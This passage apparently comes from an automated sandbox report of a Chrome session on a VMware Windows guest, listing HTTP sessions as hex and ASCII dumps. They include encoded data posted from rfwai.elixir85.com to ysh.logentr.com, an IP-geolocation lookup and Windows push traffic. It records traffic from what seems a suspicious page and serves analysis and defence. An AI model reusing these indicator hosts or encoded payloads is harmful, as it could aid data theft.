                                                        2024-07-03 19:07:28 UTC1369INData Raw: 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-07-03 19:07:28 UTC1369INData Raw: 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-07-03 19:07:28 UTC1369INData Raw: 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-07-03 19:07:28 UTC1369INData Raw: 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-07-03 19:07:28 UTC1369INData Raw: 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        96192.168.2.549831188.114.97.34433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:27 UTC733OUTPOST /nifpyfuwrptybwamhqjifvdpkdSUBupTOFEKFMKMMHWTBNFLLVDHGJXSUFNYTXJFVQHZQpqTKFJlwZCJgDwI7yzBldhljwwx40 HTTP/1.1
                                                        Host: ysh.logentr.com
                                                        Connection: keep-alive
                                                        Content-Length: 121
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Accept: */*
                                                        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Origin: https://rfwai.elixir85.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://rfwai.elixir85.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:07:27 UTC121OUTData Raw: 64 61 74 61 3d 57 38 36 6d 35 57 34 43 45 64 47 41 38 64 57 45 30 59 54 71 71 38 69 30 45 68 66 4b 6e 54 76 43 6d 79 4a 65 72 78 5a 68 43 75 6f 68 50 39 34 6a 33 77 4e 79 62 4a 61 4e 6c 4f 39 37 70 52 68 6d 31 35 63 32 31 51 6f 39 79 33 66 77 69 39 56 69 33 57 73 30 25 32 42 6b 25 32 42 41 76 61 6b 4e 55 48 68 25 32 46 6e 70 44 4f 67 53 53 4c 4a 47 38 25 33 44
                                                        Data Ascii: data=W86m5W4CEdGA8dWE0YTqq8i0EhfKnTvCmyJerxZhCuohP94j3wNybJaNlO97pRhm15c21Qo9y3fwi9Vi3Ws0%2Bk%2BAvakNUHh%2FnpDOgSSLJG8%3D
                                                        2024-07-03 19:07:27 UTC647INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:27 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Content-Length: 536
                                                        Connection: close
                                                        vary: Origin
                                                        access-control-allow-origin: https://rfwai.elixir85.com
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v1zDlB5k5elPBwokCpro%2FmdaN8irGZGoR15%2FlPB%2BtInlSFbk4Q%2BlAQlKXfY0zfmKYR92HbgJxr5UNlwu8u5XkG2Z0%2BeGBJjP1%2BMHM08oyfqWUkTx%2FaoJ0ELHUbZmtCYCQ94%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 89d92899c8987274-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-07-03 19:07:27 UTC536INData Raw: 6a 6f 31 70 66 6d 54 79 7a 4c 58 5a 63 64 33 52 52 33 6c 2b 37 6c 36 55 61 79 73 74 4c 54 69 6b 69 37 35 39 50 65 56 32 51 6a 47 76 6c 31 56 2b 45 73 76 47 69 4d 42 45 6f 69 50 73 4e 64 64 6b 2b 71 37 49 52 49 76 55 33 35 39 37 4b 41 58 5a 2f 43 6b 4a 41 76 5a 30 55 74 30 63 31 53 62 6c 38 5a 4b 59 31 78 32 43 32 51 6b 66 35 2b 31 57 50 75 30 70 58 56 6a 37 31 56 56 2f 46 75 34 49 76 72 56 34 68 69 75 55 46 39 6d 37 71 4d 39 55 61 55 36 63 55 72 34 56 44 30 66 4d 55 69 4a 4a 6e 6a 79 58 2b 6f 4e 4c 64 77 62 33 6f 58 50 39 53 34 67 64 41 72 39 58 4f 47 4f 44 4e 68 51 43 54 51 48 58 6f 59 4f 78 31 65 62 43 51 71 57 54 39 2f 79 72 6b 4c 76 59 58 73 38 49 65 72 31 72 58 41 6e 49 64 55 64 77 6c 57 76 41 7a 6c 34 37 78 76 2b 62 34 41 33 4a 62 6d 53 43 33 71 32
                                                        Data Ascii: jo1pfmTyzLXZcd3RR3l+7l6UaystLTiki759PeV2QjGvl1V+EsvGiMBEoiPsNddk+q7IRIvU3597KAXZ/CkJAvZ0Ut0c1Sbl8ZKY1x2C2Qkf5+1WPu0pXVj71VV/Fu4IvrV4hiuUF9m7qM9UaU6cUr4VD0fMUiJJnjyX+oNLdwb3oXP9S4gdAr9XOGODNhQCTQHXoYOx1ebCQqWT9/yrkLvYXs8Ier1rXAnIdUdwlWvAzl47xv+b4A3JbmSC3q2


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        97192.168.2.549830172.67.69.2264433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:27 UTC349OUTGET /8.46.123.33/json/ HTTP/1.1
                                                        Host: ipapi.co
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:07:27 UTC669INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:27 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 763
                                                        Connection: close
                                                        Allow: POST, OPTIONS, OPTIONS, HEAD, GET
                                                        X-Frame-Options: DENY
                                                        Vary: Host, origin
                                                        X-Content-Type-Options: nosniff
                                                        Referrer-Policy: same-origin
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R%2FyKFLW224a1NOR%2Bet5SgrwrnxIG7jqErb%2BVbNUYvRzez3kJVYrxz4gSYpDMf5jurhCUiRCR%2FvA1W3DypBMnI2ZRZcxkCitt%2BznlNtWnGW%2BKcAzoMpzzwbps"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 89d92899ea5b8c63-EWR
                                                        2024-07-03 19:07:27 UTC700INData Raw: 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 30 2f 32 34 22 2c 0a 20 20 20 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 20 22 4e 59 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 63 6f 75 6e
                                                        Data Ascii: { "ip": "8.46.123.33", "network": "8.46.123.0/24", "version": "IPv4", "city": "New York City", "region": "New York", "region_code": "NY", "country": "US", "country_name": "United States", "country_code": "US", "coun
                                                        2024-07-03 19:07:27 UTC63INData Raw: 75 6c 61 74 69 6f 6e 22 3a 20 33 32 37 31 36 37 34 33 34 2c 0a 20 20 20 20 22 61 73 6e 22 3a 20 22 41 53 33 33 35 36 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 4c 45 56 45 4c 33 22 0a 7d
                                                        Data Ascii: ulation": 327167434, "asn": "AS3356", "org": "LEVEL3"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        98192.168.2.549832188.114.97.34433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:28 UTC437OUTGET /nifpyfuwrptybwamhqjifvdpkdSUBupTOFEKFMKMMHWTBNFLLVDHGJXSUFNYTXJFVQHZQpqTKFJlwZCJgDwI7yzBldhljwwx40 HTTP/1.1
                                                        Host: ysh.logentr.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:07:28 UTC597INHTTP/1.1 404 Not Found
                                                        Date: Wed, 03 Jul 2024 19:07:28 GMT
                                                        Content-Type: application/json; charset=utf-8
                                                        Content-Length: 170
                                                        Connection: close
                                                        vary: Origin
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wkAmjOUGRbvL6MCev0sPu%2FTqpkU3bIJZuCXTCtKqlD5KCE%2F9SkifA4RX1GTYyqLzBZe1eWPtpN5RS5muGDTXphX%2F1bnrJhfKBypszqo8Pa%2BWQRNaZMEIK5oCa9tGcnNUCs4%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 89d9289fda660f55-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-07-03 19:07:28 UTC170INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 52 6f 75 74 65 20 47 45 54 3a 2f 6e 69 66 70 79 66 75 77 72 70 74 79 62 77 61 6d 68 71 6a 69 66 76 64 70 6b 64 53 55 42 75 70 54 4f 46 45 4b 46 4d 4b 4d 4d 48 57 54 42 4e 46 4c 4c 56 44 48 47 4a 58 53 55 46 4e 59 54 58 4a 46 56 51 48 5a 51 70 71 54 4b 46 4a 6c 77 5a 43 4a 67 44 77 49 37 79 7a 42 6c 64 68 6c 6a 77 77 78 34 30 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 22 65 72 72 6f 72 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 73 74 61 74 75 73 43 6f 64 65 22 3a 34 30 34 7d
                                                        Data Ascii: {"message":"Route GET:/nifpyfuwrptybwamhqjifvdpkdSUBupTOFEKFMKMMHWTBNFLLVDHGJXSUFNYTXJFVQHZQpqTKFJlwZCJgDwI7yzBldhljwwx40 not found","error":"Not Found","statusCode":404}


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        99192.168.2.54983740.115.3.253443
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:44 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 48 71 55 68 30 56 73 6d 56 55 53 6c 33 71 57 62 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 32 62 38 62 33 61 63 38 34 33 38 62 32 36 61 0d 0a 0d 0a
                                                        Data Ascii: CNT 1 CON 305MS-CV: HqUh0VsmVUSl3qWb.1Context: 42b8b3ac8438b26a
                                                        2024-07-03 19:07:44 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                        2024-07-03 19:07:44 UTC1076OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 35 33 0d 0a 4d 53 2d 43 56 3a 20 48 71 55 68 30 56 73 6d 56 55 53 6c 33 71 57 62 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 32 62 38 62 33 61 63 38 34 33 38 62 32 36 61 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 77 5a 2b 79 69 74 69 2f 4c 51 49 39 4b 42 37 74 65 43 72 7a 45 50 45 6a 71 59 55 6c 74 79 4f 56 56 74 2b 45 6e 7a 4d 61 58 42 34 68 31 51 7a 6c 58 6b 54 72 57 71 41 63 5a 37 57 6e 6c 4f 56 6b 68 38 63 6c 57 72 56 6b 51 64 6c 2b 4f 45 2f 72 35 30 67 74 6b 68 58 6f 6d 46 53 38 4c 62 6d 45 6d 5a 64 75 62 34 5a 63 37 65 44 65
                                                        Data Ascii: ATH 2 CON\DEVICE 1053MS-CV: HqUh0VsmVUSl3qWb.2Context: 42b8b3ac8438b26a<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdwZ+yiti/LQI9KB7teCrzEPEjqYUltyOVVt+EnzMaXB4h1QzlXkTrWqAcZ7WnlOVkh8clWrVkQdl+OE/r50gtkhXomFS8LbmEmZdub4Zc7eDe
                                                        2024-07-03 19:07:44 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 48 71 55 68 30 56 73 6d 56 55 53 6c 33 71 57 62 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 32 62 38 62 33 61 63 38 34 33 38 62 32 36 61 0d 0a 0d 0a
                                                        Data Ascii: BND 3 CON\QOS 56MS-CV: HqUh0VsmVUSl3qWb.3Context: 42b8b3ac8438b26a
                                                        2024-07-03 19:07:44 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                        Data Ascii: 202 1 CON 58
                                                        2024-07-03 19:07:44 UTC58INData Raw: 4d 53 2d 43 56 3a 20 72 68 69 78 76 49 6b 6a 71 55 47 76 66 6b 32 2f 37 44 53 32 4c 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                        Data Ascii: MS-CV: rhixvIkjqUGvfk2/7DS2Lw.0Payload parsing failed.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        100192.168.2.54983840.115.3.253443
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:44 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 38 4e 4f 37 2f 4c 4d 52 6e 30 4b 6f 4f 6a 33 4d 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 37 64 31 36 34 63 66 62 32 31 36 34 66 36 36 0d 0a 0d 0a
                                                        Data Ascii: CNT 1 CON 305MS-CV: 8NO7/LMRn0KoOj3M.1Context: c7d164cfb2164f66
                                                        2024-07-03 19:07:44 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                        2024-07-03 19:07:44 UTC1076OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 35 33 0d 0a 4d 53 2d 43 56 3a 20 38 4e 4f 37 2f 4c 4d 52 6e 30 4b 6f 4f 6a 33 4d 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 37 64 31 36 34 63 66 62 32 31 36 34 66 36 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 77 65 64 71 39 69 6b 77 4f 2b 42 6c 6f 57 32 4a 71 59 70 46 78 73 2f 43 74 57 6f 35 48 58 48 5a 6d 59 53 39 65 66 6e 56 2f 67 55 34 4d 33 73 4c 4d 6c 55 42 79 38 6d 2b 41 63 35 64 32 50 34 53 4b 66 38 4d 53 57 6f 2b 59 30 5a 55 57 41 48 56 4a 79 44 61 2f 76 5a 6b 61 55 52 44 6a 77 71 51 77 68 4c 42 78 44 61 34 34 49 77 6a
                                                        Data Ascii: ATH 2 CON\DEVICE 1053MS-CV: 8NO7/LMRn0KoOj3M.2Context: c7d164cfb2164f66<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYwedq9ikwO+BloW2JqYpFxs/CtWo5HXHZmYS9efnV/gU4M3sLMlUBy8m+Ac5d2P4SKf8MSWo+Y0ZUWAHVJyDa/vZkaURDjwqQwhLBxDa44Iwj
                                                        2024-07-03 19:07:44 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 38 4e 4f 37 2f 4c 4d 52 6e 30 4b 6f 4f 6a 33 4d 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 37 64 31 36 34 63 66 62 32 31 36 34 66 36 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: 8NO7/LMRn0KoOj3M.3Context: c7d164cfb2164f66<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                        2024-07-03 19:07:44 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                        Data Ascii: 202 1 CON 58
                                                        2024-07-03 19:07:44 UTC58INData Raw: 4d 53 2d 43 56 3a 20 4d 54 58 69 51 6f 2f 6c 4c 45 4b 69 79 69 30 33 6e 6b 79 32 77 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                        Data Ascii: MS-CV: MTXiQo/lLEKiyi03nky2wQ.0Payload parsing failed.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        101192.168.2.54984035.190.80.14433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:49 UTC547OUTOPTIONS /report/v4?s=fJLqGBSa3FkswmLN9bCexSRo%2FOCeeyUYPrtX20YljbJIejETBET5PKRKjJ17QWr%2BwEH2zHT3SgVm%2F%2F6z%2FYA3HJoaL8b6Hd59RRiuB%2BB1aNQl5EAEER7Y%2FPKe1F%2Bgdw%3D%3D HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Origin: https://rfwai.elixir85.com
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: content-type
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:07:49 UTC336INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        access-control-max-age: 86400
                                                        access-control-allow-methods: POST, OPTIONS
                                                        access-control-allow-origin: *
                                                        access-control-allow-headers: content-type, content-length
                                                        date: Wed, 03 Jul 2024 19:07:49 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        102192.168.2.54983935.190.80.14433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
